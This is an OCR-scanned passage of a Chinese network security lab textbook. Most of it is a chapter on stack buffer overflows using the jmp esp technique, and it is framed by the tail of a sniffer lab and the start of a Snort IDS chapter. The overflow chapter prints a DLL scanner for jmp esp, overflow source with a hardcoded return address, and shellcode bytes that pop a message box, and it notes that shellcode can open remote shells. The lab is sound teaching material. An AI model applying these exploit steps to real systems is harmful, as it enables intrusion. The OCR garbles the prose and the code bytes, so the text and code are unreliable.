Kd 11.3 # Library files 中 添加 路 径 


11.5.3 运行 程序 


设置 完成 后 ,就 可 以 编译 了 。 编 
所 示 。 


了 成 功 ,根据 提示 选择 接口 号 为 2, 如 图 11. 4 


1.NDeviceNNPF GenericDialupfdapter Adapter for generic dialup and UPN capture 
2.NDeviceNNPF (093057FC-B9BE-4C51-9265-509FDRC881CB) UMware Accelerated AMD PCNe 
t Adapter 

Enter the interface number (1-2): 


图 11.4 选择 接口 号 


最 后 得 到 结果 如 图 11. 5 所 示 。 
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ExpNIS\NetAD-Lab\Projects\Sniffer\PcapApp\Debug\PcapApp.exe’ 
43 41 43 41 41 41 08 809 20 98 81 


11.6 思考 问题 


1. 防止 局 域 网 嗅 探 敏 感 信息 的 解决 办 法 有 哪些 ? 
2. 能 否 设 计 一 种 方法 抓 取 不 同 网 段 上 的 数据 包 ? 
I 安全 策略 启用 前 后 嗅 探 到 的 数据 会 有 何不 同 ? 


第 12 章 ”利用 跳 转 指令 实现 缓冲 区 溢出 


12.1 实验 目的 与 要 求 


。 掌握 缓冲 区 溢出 原理 。 
* 利用 jmp esp 指令 实现 缓冲 区 溢出 。 
。 掌握 缓冲 区 溢出 攻击 的 防范 措施 。 


12.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003, 在 交换 网 络 结构 下 ,每 组 1 人 ,使 
用 Depends、FindJjmpesp、UltraEdit-32 和 Visual C++ 6.0, 


12.3 背景 知识 


简单 来 说 ,通过 向 程序 的 缓冲 区 (堆栈 等 ) 中 写 人 超出 其 长 度 的 数据 ,就 可 以 造成 缓冲 
区 溢出 。 缓 冲 区 的 游 出 可 以 破坏 程序 执行 流程 ,使 程序 转向 执行 其 他 指令 。 利 用 缓冲 区 洲 
出 可 以 达到 攻击 主机 的 目的 。 打 个 比方 来 说 ,缓冲 区 溢出 的 含义 是 为 缓冲 区 提供 了 多 于 其 
存储 容量 的 数据 ,就 像 往 容器 里 倒 人 了 过 量 的 水 一 样 。 通 常情 况 下 ,缓冲 区 溢出 的 数据 只 会 
破坏 程序 数据 ,造成 意外 终止 。 但 是 如 果 有 人 精心 构造 溢出 数据 的 内 容 ,那么 就 有 可 能 获得 
系统 的 控制 权 。 如 果 说 用 户 ( 也 可 能 是 黑客 ) 提 供 了 水 一 一 缓冲 区 溢出 攻击 的 数据 ,那么 系 
统 提供 了 溢出 的 容器 一 一 缓冲 区 。 缓 冲 区 在 系统 中 的 表现 形式 是 多 样 的 ,高 级 语言 定义 的 
变量 ,数组 ,结构 体 等 在 运行 时 可 以 说 都 是 保存 在 缓冲 区 内 的 ,因此 缓冲 区 可 以 更 抽象 地 理 
解 为 一 段 可 读 写 的 内 存 区 域 ,缓冲 区 攻击 的 最 终 目 的 就 是 希望 系统 能 执行 这 块 可 读 写 内 存 
中 已 经 被 蓄意 设 定好 的 恶意 代码 。 按 照 汉 。 诺 依 曼 存储 程序 原理 ,程序 代码 是 作为 二 进 制 
数据 存储 在 内 存 的 ,同样 程序 的 数据 也 在 内 存 中 ,因此 直接 从 内 存 的 二 进 制 形式 上 是 无 法 区 
分 哪些 是 数据 哪些 是 代码 的 ,这 也 为 缓冲 区 溢出 攻击 提供 了 可 能 。 

一 般 都 知道 ,每 个 程序 都 能 看 到 一 片 完整 .连续 的 地 址 空间 ,这 些 空间 并 没有 直接 关联 
到 物理 内 存 , 而 是 操作 系统 提供 了 内 存 的 一 种 抽象 概念 ,使 得 每 个 进程 都 有 一 个 连续 、 完 整 
的 地 址 空间 ,在 程序 的 运行 过 程 中 ,再 完成 虚拟 地 址 到 物理 地 址 的 转换 。 同 样 知道 ,进程 的 
地 址 空间 是 分 段 的 ,存在 数据 段 .代码 段 .bbs 段 . 堆 和 栈 等 。 每 个 段 都 有 特定 的 作用 。 对 于 
32 位 的 机 器 来 说 ,虚拟 的 地 址 空间 大 小 就 是 4GB, 可 能 实际 的 物理 内 存 大 小 才 1GB 到 
2GB, 意 味 着 程序 可 以 使 用 比 物理 内 存 更 大 的 空间 。 

图 12. 1 是 进程 地 址 空间 分 布 的 简单 示意 图 。 代 码 段 存 储 了 用 户 程序 的 所 有 可 执行 代 
码 ,在 程序 正常 执行 的 情况 下 ,程序 计数 器 (PC 指针 ) 只 会 在 代码 段 和 操作 系统 地 址 空间 
(内 核 态 ) 内 寻 址 ,通常 ,这 一 段 是 可 以 共享 的 , 即 多 线程 共享 进程 的 代码 段 。 并 且 , 此 段 是 只 
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读 的 ,不 能 修改 。 数 据 段 内 存储 了 用 户 程序 的 全 局 变量 文字 池 等 。 堆 和 栈 : 这 两 个 词 大 家 
都 十 分 熟悉 了 ,new 或 者 malloc 分 配 的 空间 在 堆 上 ,需要 程序 员 
维护 ,车 没有 主动 释放 堆 上 的 空间 ,进程 运行 结束 后 会 被 释放 。 E 
栈 上 的 是 函数 栈 临 时 的 变量 ,还 有 程序 的 局 部 变量 ,自动 释放 。 0xc0000000 
棱 空间 存储 了 用 户 程序 的 函数 栈 帧 (包括 参数 局 部 数据 等 ), 实 | lem 
现 函数 调用 机 制 , 它 的 数据 增长 方向 是 低地 址 方向 。 堆 空间 存储 。 ree 
了 程序 运行 时 动态 申请 的 内 存 数据 等 ,数据 增长 方向 是 高 地 址 方 [RS 
向 。 除 了 代码 段 和 受 操作 系统 保护 的 数据 区 域 ,其 他 的 内 存 区 域 u 
都 可 能 作为 缓冲 区 ,因此 缓冲 区 溢出 的 位 置 可 能 在 数据 段 ,也 可 共享 库 和 
能 在 堆 、 栈 段 。 如 果 程 序 的 代码 有 软件 漏洞 ,恶意 程序 会 “教唆 ” 
程序 计数 器 从 上 述 缓冲 区 内 取 指 ,执行 恶意 程序 提供 的 数据 人 人 
代码 。 上 一 一 一 一 一 一 刁 break 

栈 的 主要 功能 是 实现 函数 的 调用 。 因 此 在 介绍 栈 溢 出 原理 
之 前 ,需要 弄 清 函 数 调用 时 栈 空间 发 生 了 怎样 的 变化 。 每 次 函数 TAS 
调用 时 ,系统 会 把 函数 的 返回 地 址 (函数 调用 指令 后 紧 跟 指令 的 0x8048000 
地 址 ) ,一 些 关键 的 寄存 器 值 保存 在 栈 内 ,函数 的 实际 参数 和 局 部 。 一 一 一 一 
变量 (包括 数据 结构 体 、 对 象 等 ) 也 会 保存 在 栈 内 。 这 些 数据 统 “图 12. 1 进程 地 址 空间 
称 为 函数 调用 的 栈 帧 ,而 且 是 每 次 函数 调用 都 会 有 个 独立 的 本 UER 
帧 ,这 也 为 递归 函数 的 实现 提供 了 可 能 。 之 所 以 会 有 缓冲 区 溢出 
的 可 能 ,主要 是 因为 栈 空间 内 保存 了 函数 的 返回 地 址 。 该 地 址 保存 了 函数 调用 结束 后 后 续 
执行 指令 的 位 置 ,对 于 计算 机 安全 来 说 ,该 信息 是 很 敏感 的 。 如 果 有 人 恶意 修改 了 这 个 返回 
地 址 ,并 使 该 返回 地 址 指向 了 一 个 新 的 代码 位 置 ,程序 便 能 从 其 他 位 置 继续 执行 。 

很 多 程序 都 会 接受 用 户 的 外 界 输入 ,尤其 是 当 函 数 内 的 一 个 数组 缓冲 区 接受 用 户 输入 
的 时 候 , 一 旦 程序 代码 未 对 输入 的 长 度 进行 合法 性 检查 ,缓冲 区 溢出 便 有 可 能 触发 。 例 如 下 
边 的 这 个 函数 


z 
5 
= 
fe 
x| 


{ 
unsigned char buffer [BUF_IEN]; 
stropy ((char* )buffer, (char * )data); // 洪 出 点 
$ 
这 个 函数 是 一 个 典型 的 栈 溢出 代码 。 在 使 用 不 安全 的 strcpy 库 函 数 时 ,系统 会 盲目 地 
将 data 的 全 部 数据 复制 到 buffer 指向 的 内 存 区 域 。buffer 的 长 度 是 有 限 的 ,一 旦 data 的 数 
据 长 度 超 过 BUF_LEN , 便 会 产生 缓冲 区 溢出 。 由 于 栈 是 低地 址 方向 增长 的 ,因此 局 部 数组 
buffer 的 指针 在 缓冲 区 的 下 方 。 当 把 data 的 数据 复制 到 buffer 内 时 ,超过 缓冲 区 的 高 地 址 
部 分 数据 会 “淹没 "原本 的 其 他 栈 帧 数据 ,根据 淹没 数据 的 内 容 不 同 , 可 能 会 产生 以 下 情况 。 
CD 淹没 了 其 他 的 局 部 变量 。 如 果 被 淹没 的 局 部 变量 是 条 件 变量 ,那么 可 能 会 改变 函 
数 原本 的 执行 流程 。 这 种 方式 可 以 用 于 破解 简单 的 软件 验证 。 
(2) 淹没 了 ebp 的 值 。 修 改 了 函数 执行 结束 后 要 恢复 的 栈 指 针 , 将 会 导致 栈 帧 失去 
平衡 。 
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G) 淹没 了 返回 地 址 。 这 是 栈 溢出 原理 的 核心 所 在 ,通过 淹没 的 方式 修改 函数 的 返回 
地 址 ,使 程序 代码 执行 “意外 ”的 流程 。 

(A) 淹没 参数 变量 。 修 改 函 数 的 参数 变量 也 可 能 改变 当前 函数 的 执行 结果 和 流程 。 

(5) 淹没 上 级 函数 的 栈 帧 ,情况 与 上 述 4 点 类 似 , 只 不 过 影响 的 是 上 级 函数 的 执行 。 当 
然 这 里 的 前 提 是 保证 函数 能 正常 返回 , 即 函 数 地 址 不 能 被 随意 修改 。 

如 果 在 data 本 身 的 数据 内 就 保存 了 一 系列 指令 的 二 进 制 代 码 ,一 旦 栈 溢 出 修改 了 函数 
的 返回 地 址 ,并 将 该 地 址 指向 这 段 二 进 制 代 码 的 其 他 位 置 ,那么 就 完成 了 基本 的 溢出 攻击 行 
为 。 通 过 计算 返回 地 址 内 存 区 域 相对 于 buffer 的 偏 移 , 并 在 对 应 位 置 构造 新 的 地 址 指向 
buffer 内 部 二 进 制 代码 的 其 他 位 置 , 便 能 执行 用 户 的 自 定义 代码 。 这 段 既 是 代码 又 是 数据 
的 二 进 制 数 据 被 称 为 shellcode, 因 为 攻击 者 希望 通过 这 段 代 码 打开 系统 的 shell, 以 执行 任 
意 的 操作 系统 命令 ,如 下 载 病毒 、 安 装 木 马 、 开 放 端 口 .格式 化 磁盘 等 恶意 操作 。 

shellcode 实质 是 指 溢出 后 执行 的 能 开启 系统 shell 的 代码 。 但 是 在 缓冲 区 溢出 攻击 
时 ,也 可 以 将 整个 触发 缓冲 区 溢出 攻击 过 程 的 代码 统称 为 shellcode, 按 照 这 种 定义 可 以 把 
shellcode 分 为 四 部 分 : 

(1) 核心 shellcode 代码 ,包含 了 攻击 者 要 执行 的 所 有 代码 。 

(2) 溢出 地 址 ,是 触发 shellcode 的 关键 所 在 。 

(3) 填充 物 ,填充 未 使 用 的 缓冲 区 ,用 于 控制 溢出 地 址 的 位 置 ,一 般 使 用 nop 指令 填 
充 一 一 0x90 表示 。 

(4) 结束 符号 0, 对 于 符号 串 shellcode 需要 用 0 结尾 ,避免 溢出 时 字符 串 异 常 。 

缓冲 区 溢出 攻击 成 功 后 ,如 果 被 攻击 的 程序 有 系统 的 root 权限 ,如 系统 服务 程序 ,那么 
攻击 者 基本 上 可 以 为 所 欲 为 了 。 但 是 需要 清楚 的 是 ,核心 shellcode 必须 是 二 进 制 代码 形 
式 。 而 且 shellcode 执行 时 是 在 远程 的 计算 机 上 ,因此 shellcode 是 否 能 通用 是 一 个 很 复杂 
的 问题 。 可 以 用 一 段 简单 的 代码 实例 来 说 明 这 个 问题 。 

缓冲 区 溢出 成 功 后 ,一般 大 家 都 会 希望 开启 一 个 远程 的 shell 控制 被 攻击 的 计算 机 。 开 
JA shell 最 直接 的 方式 便 是 调用 C 语言 的 库 函 数 system, 该 函数 可 以 执行 操作 系统 的 命令 ， 
就 像 在 命令 行 下 执行 命令 那样 。 假 如 执行 cmd 命令 一 一 在 远程 计算 机 上 启动 一 个 命令 提 
示 终 端 。 

因此 ,要 实施 一 次 有 效 的 缓冲 区 溢出 攻击 ,攻击 者 必须 完成 以 下 任务 。 

(1) 在 程序 的 地 址 空间 里 植 人 适当 的 代码 ( 称 为 shellcode) ,用 于 完成 获取 系统 控制 权 
等 非法 任务 。 

(2) 通过 修改 寄存 器 或 内 存 , 让 程序 执行 流 跳 转 到 攻击 者 植 入 的 shellcode 地 址 空间 
执行 。 

下 面 以 栈 溢出 为 例 ,简要 介绍 这 两 个 任务 的 实现 方法 。 

(1) shellcode 植 人 。 当 缓冲 区 溢出 发 生 在 程序 的 L/O 操作 附近 时 ,攻击 者 可 以 直接 利 
用 程序 的 输入 ,向 程序 中 植 入 shellcode。 

(2) 程序 执行 流程 的 跳 转 。shellcode 植 人 后 ,缓冲 区 溢出 便 会 发 生 ,以 上 面 的 栈 溢出 为 
例 , 如 图 12.2 至 图 12.4 所 示 , 函 数 调 用 的 返回 地 址 被 覆盖 为 AAAAA, 这 样 当 此 函数 执行 
完毕 返回 时 ,程序 执行 流 会 跳 转 到 0xAAAAA( 即 shellcode) 处 继续 执行 。 

图 12. 2 至 图 12. 4 分 别 是 栈 溢出 示例 、 正 常 的 存 有 数据 的 缓冲 区 示例 和 缓冲 区 溢出 的 
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示例 (向 缓冲 区 name 写 人 的 数据 超过 了 缓冲 区 的 容量 ) 。 


内 存 低 端 内 存 高 端 
堆栈 顶部 堆栈 底部 
name EBP ret 
&name 


图 12.2 栈 溢出 示例 


内 存 低 端 内 存 高 端 
堆栈 项 部 堆栈 底部 
| hello world! | | 
name EBP Tet 
&name 


图 12.3 正常 存 有 数据 的 缓冲 区 示例 


内 存 低 端 内 存 高 端 
堆栈 顶部 堆栈 底部 
[hello worldlAAAAAAAAAAAA|AAAA|AAAAA| A 
i name EBP ret 
&name 


Fd 12.4 缓冲 区 溢出 时 示例 


上 述 过 程 虽然 理论 上 能 完成 栈 溢出 攻击 行为 ,但 是 实际 上 很 难 实 现 。 操 作 系 统 每 次 加 
载 可 执行 文件 到 进程 空间 的 位 置 都 是 无 法 预测 的 ,因此 栈 的 位 置 实际 是 不 固定 的 ,通过 硬 编 
码 覆 盖 新 返回 地 址 的 方式 并 不 可 靠 。 为 了 能 准确 定位 shellcode 的 地 址 ,需要 借助 一 些 额 外 
的 操作 ,其 中 最 经 典 的 是 借助 跳板 的 栈 溢出 方式 。 借 助 于 跳板 的 确 可 以 很 好 地 解决 栈 帧 移 
位 ( 栈 加 载 地 址 不 固定 ) 的 问题 ,但 是 跳板 指令 从 哪儿 找 呢 ? 在 Windows 操作 系统 加 载 的 大 
fit dll 中 ,包含 了 许多 这 样 的 指令 ,如 kernel32. dll .ntdll. dll, 这 两 个 动态 链接 库 是 Windows 
程序 默认 加 载 的 。 如 果 是 图 形 化 界面 的 Windows 程序 ,还 会 加 载 user32. dll, 它 也 包含 了 
大 量 的 跳板 指令 ,而 且 更 “神奇 "的 是 Windows 操作 系统 加 载 dll 时 一 般 都 是 固定 地 址 ,因此 
这 些 dll 内 的 跳板 指令 的 地 址 一 般 都 是 固定 的 。 可 以 离线 搜索 出 跳板 执行 在 dll 内 的 偏 移 ， 
并 加 上 dll 的 加 载 地 址 , 便 得 到 一 个 适用 的 跳板 指令 地 址 。 
这 里 给 出 一 段 简单 的 搜索 跳板 指令 的 代码 用 于 参考 。 
/查询 dl 内 第 一 个 jmp esp 指 令 的 位 置 
int findump(char* dll name) 
{ 
char* handle= (char* )IoadLibraryA (dll name); // 获 取 dll 加载 地 址 
for (int pos- 0;;pos++ ) // 遍 历 an 代码 空间 
if (handle [pos]== (char)Oxff&shandle[post 1]== (char) 0xe4) 
// 寻 找 Oxf fe4= jmp esp 
{ 
retum (int) (handle+ pos); 
) 
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12.4 实验 内 容 


了 解 缓冲 区 溢出 的 原理 ,编写 代码 通过 缓冲 区 溢出 来 实现 弹出 消息 框 。 


12.5 实验 步骤 


本 实验 操作 通过 缓冲 区 溢出 来 实现 弹出 消息 框 (MessageBox 对 话 框 )。 针 对 Windows 
平台 实现 缓冲 区 溢出 ,该 实验 实现 溢出 的 方式 及 流程 具有 着 一 定 的 通用 性 。 

需要 开发 实现 两 部 分 内 容 : 一 部 分 是 漏洞 程序 ,该 程序 通过 memcpy 函数 实现 缓冲 区 
溢出 ,当然 也 可 以 通过 其 他 函数 如 strcpy 实现 溢出 ; 另 一 部 分 内 容 则 是 生成 shellcode， 
shellcode 是 程序 溢出 后 欲 执 行 的 指令 代码 ,如 通过 shellcode 实现 程序 溢出 后 弹出 对 话 框 等 
功能 。 

对 照 图 12. 5, 在 程序 正常 执行 时 ,memcpy 函数 被 执行 完毕 后 ,指令 指针 会 返回 至 ret 
地 址 处 ,继续 执行 memcpy 函数 调用 处 的 后 续 指 令 ; 同 时 ,执行 完 ret 指令 后 ESP 指针 也 会 
指向 堆栈 原始 区 (调用 memcpy 函数 前 一 时 刻 的 堆栈 分 布 )。 因 此 ,可 以 将 溢出 代码 
shellcode 存在 堆栈 原始 区 ,而 剩 下 的 工作 就 是 在 memepy 执行 返回 时 让 EIP 指针 指向 原始 
区 (也 就 是 ESP 指针 指向 的 地 址 ) 即 可 。 如 何 通过 ret 返回 地 址 确定 此 时 的 堆栈 ESP 指针 
指向 呢 ? 在 这 里 采用 的 方法 是 通过 跳 转 指令 jmp esp( 无 条 件 跳 转 至 esp 指向 处 执行 )。 通 
过 在 用 户 地 址 空间 中 查找 到 包含 jmp esp 指令 的 存储 地 址 ,用 该 地 址 覆盖 rec 返回 地 址 就 可 
UT. 


AFRI 9 — — — — — — — 内 存 高 址 


局 部 变量 原 |] recam 
| buffZz]i] EBP "EI 原始 区 
| 前 导 码 前 导 码 | Euh | 自 定义 指令 
ESP 


图 12.5 程序 内 存 分 配 


在 具体 实现 时 ,通过 3 个 步骤 完成 缓冲 区 溢出 。 

1. 编写 填充 码 。 

填充 码 就 是 用 于 覆盖 局 部 变量 到 ret 返回 地 址 之 间 的 堆栈 空间 (不 包括 ret 返回 地 址 空 
间 ) 的 指令 码 。 填 充 码 仅 是 用 于 填充 堆栈 ,所 以 其 内 容 不 受 限 制 。 需 要 在 实际 的 调试 中 来 确 
定 填充 码 的 大 小 。 

说 明 : cgc 等 诸多 C 编译 器 在 为 局 部 变量 申请 内 存 空间 时 ,经 常 要 多 出 若干 字 节 。 

2. 查找 jmp esp 指令 地 址 

用 jmp esp 指令 的 地 址 覆盖 ret ,就 可 以 在 memcpy 执行 返回 后 让 CPU 执行 跳 转 指令 ， 
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所 以 首要 解决 的 是 在 用 户 空 间 中 找到 含有 jmp esp 指令 的 地 址 。 通 过 反 汇 编 可 以 得 到 jmp 
esp 指令 的 机 器 码 为 0xFFE4。 这 里 使 用 了 中 软 吉他 系统 提供 的 FindJmpesp 工具 进行 指令 
查找 ,如 果 没 有 该 系统 支持 ,也 可 以 自己 参照 原理 部 分 的 代码 实例 编写 一 个 程序 来 实现 查找 
工具 ,通过 该 工具 确定 一 个 含有 jmp esp 指令 的 内 存 地 址 。 

注 : 在 用 户 地 址 空间 中 会 存在 多 个 包含 jmp esp 指令 的 地 址 。 

3. shellcode 代码 

shellcode 代码 实现 了 溢出 后 主要 的 执行 功能 ,如 创建 超级 用 户 、 提 升 用 户 权限 等 。 在 
这 里 通过 自 定义 指令 来 实现 弹出 用 户 对 话 框 。 


12.5.1 编写 填充 码 


启动 VC++ 6.0。 选 择 File-- Open Workspace 菜单 命令 ,加 载 工程 文件 C:\ExpNIS\ 
NetAD-Lab\ Projects V OverFlow \ Missionl V overflow. dsw, 该 工程 包含 两 个 项 目 , BI 
overflow 和 CreateShellcode 项 目 。 

将 overflow 项 目 设 置 为 启动 项 目 (Set as Active Project), 该 项 目 仅 有 一 个 源 文 件 
overflow. c, 在 此 源 文件 中 提供 了 部 分 代码 ,注释 的 地 方 需要 根据 实际 调试 结果 来 填写 。 

这 里 的 源 代码 引用 了 中 软 吉他 系统 提供 的 部 分 代码 ,如 果 没 有 这 套 系统 也 可 以 自行 编 
写 代码 ,这 里 给 出 部 分 overflow. c 的 源 代码 用 于 参考 。 


int main (int argc, char ** argv) 
{ 

/定义 shellcode 指 令 集 , 用 该 指令 集 对 部 分 堆栈 空间 进行 填充 ,并 实现 指令 跳 转 及 弹出 对 话 框 
功能 的 实现 

/* 长 填充 码 unsigned char shelloode[]- {0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 
0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x50, Ox5l, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 
0x58, 0x59, 0x60, Ox6l, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,0x70, Ox71, 0x72}; 

*/ 

/1. 请 根据 实际 调试 结果 从 长 填充 码 中 截取 片段 ,作为 shellcode 填 充 码 
/* unsigned char shelloode[]- (0x30, Ox31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x40, Ox4l, 
0x42, 0x43, 0x44, 0x45 

B 
*/ 

//2. 查找 包含 jp esp 指 令 的 内 存 地 址 ,并 将 其 追加 到 shellcode 尾 。 注 意 追 加 顺序 先 低 地 址 字 
节 ) 
unsigned char shelloode[]- (0x30, 0x31, 0x32, 0x33, 
0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x40, Ox4l, 0x42, 
0x43, 0x44, 0x45, Oxda, 0x24, Oxe4, 0x77}; 
*/ 

//3. Makeshellcode 反 汇编 获得 shellcode 执 行 体 ,并 将 其 追加 至 shellcode 尾 

unsigned char shellcode[]= (0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x40, Ox41, 0x42, 
0x43, 0x44, 0x45, Oxda, 0x24, Oxe4, 0x77, 0x55, 0x51, Oxf, Oxec, 0x83, Oxec, 0x54, 0x33, Oxc9, Oxc6, 0x45, 
Oxec, Ox5e, Oxc6, 0x45, Oxed, Ox6f, Oxc6, 0x45, Oxee, Ox5e, Oxc6, 0x45, Oxef, Oe, Oxc6, 0x45, Oxf0, 0x2e, 
Oxc6, 0x45, Oxfl, Oxb6, Oxc6, 0x45, Oxf2, Oxdl, Oxc6, 0x45, Oxf3, Oxd5, Oxc6, 0x45, Oxf4, Ox, Oxc6, 0x45, 
Oxf5, Oxb3, Oxc6, 0x45, Oxf6, Oxc9, Oxc6, 0x45, Oxf7, Oxb9, Oxc6, 0x45, Oxf8, Oxa6, Oxc6, 0x45, Oxf9, Oxd2, 
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Oxc6, 0x45, Oxfa, Oxe7, Oxc6, 0x45, Oxfb, Oxb3, Oxc6, 0x45, Oxfc, Oxf6, Oxc6, 0x45, Oxfd, Ox21, 0x88, Ox4d, 
Oxfe, 0x51, Ox8d, 0x45, Oxfl, 0x50, Ox8d, 0x45, Oxec, 0x50, 0x51, Oxc7, 0x45, Oxe0, Oxde, Oxd8, Oxe4, 0x77, 
Oxff, 0x55, OxeO, Oxc7, 0x45, OxdO, 0x39, 0x30, Ox81, Ox7c, Oxff, 0x55, OxdO, Ox8b, Oxe5, 0x59, Ox5d); 


if(Load user library()-- - 1) 
retum 0; 


overflow((char* )shellcode, (unsigned int) strlen (shelloode)); 


getchar (); 
retum 0; 
} 
程序 中 提供 了 一 个 超 长 填充 码 , 需 要 对 程序 进行 调试 来 确定 实际 需要 的 填充 码 长 度 。 
调试 过 程 如 图 12.6 所 示 。 


004010F8 8B 45 OC 
804610FB 50 TTT 
G04019FC BB AD 08 | 19484745 
00019FF 51 > 49484746 
60401100 8D 55 F^ | 49585757 
900101103 52 um 
00401104 ES 17 03 00 00 call mencpy (004014 
90101109 83 Ch 9C add 


0040110C SF pop edi 
60401100 SE pop esi 
9040110E 5B pop ebx 
00401140F 83 Ch AC add esp, Ch 
00401112 3B EC cnp ebp,esp 


90401114 ES C7 02 00 00 call hkesp (004M 
00401119 8B ES nov flow 调 用 返回 
90401118 5D pop 


09040111C C3 ret 


图 12.6 程序 调试 确定 填充 码 长 度 


在 图 12. 6 中 可 以 看 出 ,0x49484746 四 字 节 覆盖 了 ret 返回 地 址 ,请 根据 调试 结果 重新 
确定 shellcode 指令 集 长 度 , 确 定 ret 返回 地 址 能 够 被 填充 码 的 后 续 4 0E Ee 


12.5.2 查找 jmp esp 指令 地 址 


需要 在 用 户 地 址 空间 中 找到 包含 jmp esp 指令 (机 器 码 为 0xFFE4) 的 地 址 。 运 行 
FindJmpesp 工具 ,选取 一 个 地 址 追加 到 shellcode 尾 ( 追 加 地 址 时 注意 数组 高 字 节 对 应 地 址 
高 位 ) ,所 选 jmp esp 指令 地 址 是 

跟踪 调试 程序 ,确定 在 memcpy 执行 返回 时 jmp esp 指令 是 否 被 执行 。 可 以 在 
shellcode 尾部 继续 追加 空 指令 (0x90 , 空 指令 不 进行 任何 操作 ) ,这 样 便于 确定 执行 jmp esp 
后 指令 指针 的 指向 。 

下 一 步 所 要 做 的 工作 就 是 将 实现 弹出 对 话 框 的 指令 码 追 加 至 shellcod 中 jmp esp 指令 
地 址 的 后 面 。 


12.5.3 生成 实现 弹出 对 话 框 的 指令 码 


最 终 的 目的 是 要 通过 缓冲 区 溢出 实现 弹出 消息 对 话 框 , 而 这 些 功能 都 应 该 在 shellcode 
得 以 实现 。 通 过 在 shellcode 中 调用 MessageBoxA API 函数 .并 确定 好 MessageBoxA 所 需 
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的 4 个 参数 , 即 窗 体 句柄 、 标 题 显 示 、 内 容 显 示 和 风格 , 便 可 以 实现 弹出 指定 内 容 的 对 话 框 。 

根据 Windows API 文档 ,MessageBoxA 依赖 于 user32. lib, 也 就 是 说 , 它 位 于 user32. 
dll 动态 链接 库 中 。 打 开 VC 反 编 译 工具 Dependy wakler. Depends 打开 应 用 程序 C:\ 
ExpNIS\NetAD-Lab\ Tools \ OverFlow \ Mission] \ overflow_win. exe, 可 以 发 现 它 将 加 载 
user32. dll。 然 后 寻找 MessageBoxA 函数 的 内 存 位 置 。 具 体操 作 如 图 12. 7 所 示 。 


Dependency Walker - [overflow_win.exe] 


Wü He Edt Vew Window Heb 


到 到 于 a SEIT e] 


349 (0x015D) 
422 (0x01A6) 


447 (0xO1EF) 


479 (OxO10F) 478 (OxO1DE) Mess. 


图 481 (Ox01ET) 480 (0xO1EO)  MessageBoxExA 
fe) 482 (0x01E2) 461 (0xO1E1) MessageBoxExW 
fel 483 (0x01E3) 482 (0xO1E2) — MessaoeBoxIndirectA. 


图 12.7 在 VC 反 编 译 工 具 中 打开 应 用 程序 


(1) 在 左 侧 Module 树 状 视图 中 选中 USER32. DLL 节点 。 

(2) 在 右 侧 导出 函数 列表 视图 中 遍历 Function 属性 列 ,查找 函数 MessageBoxA( 序 号 
480) 。 

(3) 在 下 侧 Module 列表 视图 中 遍历 Module 属性 列 ,查找 模块 USER32. DLL. 

在 这 里 的 user32. dll 中 , MessageBoxA (ASCII 版 本 pH Zt AY fi Ee HE (Entry Point) 为 
0x0003D8DE, User32. dll(Module) 在 内 存 中 的 起 始 地 址 (Base) 为 0x77E10000。 将 两 者 相 
加 即 可 得 到 MessageBoxA 函数 的 绝对 内 存 地 址 。 所 以 需要 在 汇编 代码 中 正确 设置 堆栈 并 
调用 MessageBoxA 函数 的 绝对 内 存 地 址 ,该 地 址 为 

另外 ,还 需要 调用 执行 函数 ExitProcess( 位 于 KERNEL32. dll 中 ) ,其 目的 就 是 在 单 击 
弹出 框 的 “确定 ”按钮 后 程序 自动 退出 ,函数 ExitProcess 的 绝对 内 存 地 址 o 

在 overflow 工程 中 将 Createshellcode 项 目 设 置 为 启动 项 目 , 该 项 目 仅 有 一 个 源 文件 
Createshellcode. c, 在 此 源 文 件 中 提供 了 全 部 的 代码 及 注释 说 明 。 代 码 的 主体 部 分 是 用 汇 
编 语言 实现 的 ,其 功能 就 是 实现 弹出 对 话 框 后 自动 退出 程序 。 

将 函数 MessageBoxA 和 ExitProcess 的 绝对 内 存 地 址 填写 到 指定 位 置 。 

在 理解 了 Createshellcode. c 中 的 汇编 部 分 代码 后 ,就 可 以 利用 VC++ 6.0 反 汇 编 功 能 
获取 代码 字 节 ,调试 过 程 如 图 12. 8 所 示 。 

将 代码 字 节 以 十 六 进 制 数据 形式 继续 追加 到 shellcode JE. 

重新 编译 执行 就 可 以 看 到 对 话 框 弹出 。 


12.6 


SF wn ee 


第 亿 章 


6988619F7| 55 
805018F8| 51 
B05010F9| 8B EC 
9805018FB|83 EC 5^ 
B05018FE| 33 C9 
00501100| Có 45 EC SE 
80501105 C6 45 ED 6F 
00501108|Có 45 EE 5E 
0050118C| Có 45 EF 2E 
00501110 C6 45 FO 2E 
06401114) Có 45 F1 B6 
80501118|Có 45 F2 D1 


ecx,ecx 
byte ptr [ebp-14h],5Eh 
byte ptr [ebp-13h],6Fh 
byte ptr [ebp-12h],5Eh 
byte ptr [ebp-11h] ,2Eh 
byte ptr [ebp-10h],2Eh 
byte ptr [ebp-OFh] , 0Bóh 
byte ptr [ebp-9Eh],9D1h 


图 12.8 反 汇 编 调试 过 程 


思考 问题 


怎样 确定 jmp esp 指令 的 地 址 ? 


缓冲 区 溢出 的 解决 方法 有 哪些 ? 


请 举 出 流行 的 缓冲 区 溢出 漏洞 类 型 。 
如 何 将 操作 系统 中 关于 缓冲 区 的 知识 和 溢出 攻击 联系 起 来 ? 


利用 跳 转 指 令 实现 缓冲 区 溢出 
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第 13 章 ”基于 网 络 人 侵 检测 系统 


13.1 实验 目的 与 要 求 


。 掌握 snort IDS 体系 结构 和 工作 机 理 。 
学 习 使 用 snort 捕获 和 分 析 数 据 包 信息 。 
。 应 用 snort 的 3 种 方式 工作 。 

学 习 熟 练 编写 snort 规则 。 


13.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 及 Linux, 在 企业 网 络 结构 下 ,每 组 
两 人 ,使 用 Fragroute、Snort、Flood 工具。 


13.3 背景 知识 


13.3.1 人 侵 检 测 系统 


当 越 来 越 多 的 公司 将 其 核心 业务 向 互联 网 转移 的 时 候 , 网 络 安全 作为 一 个 无 法 回避 的 
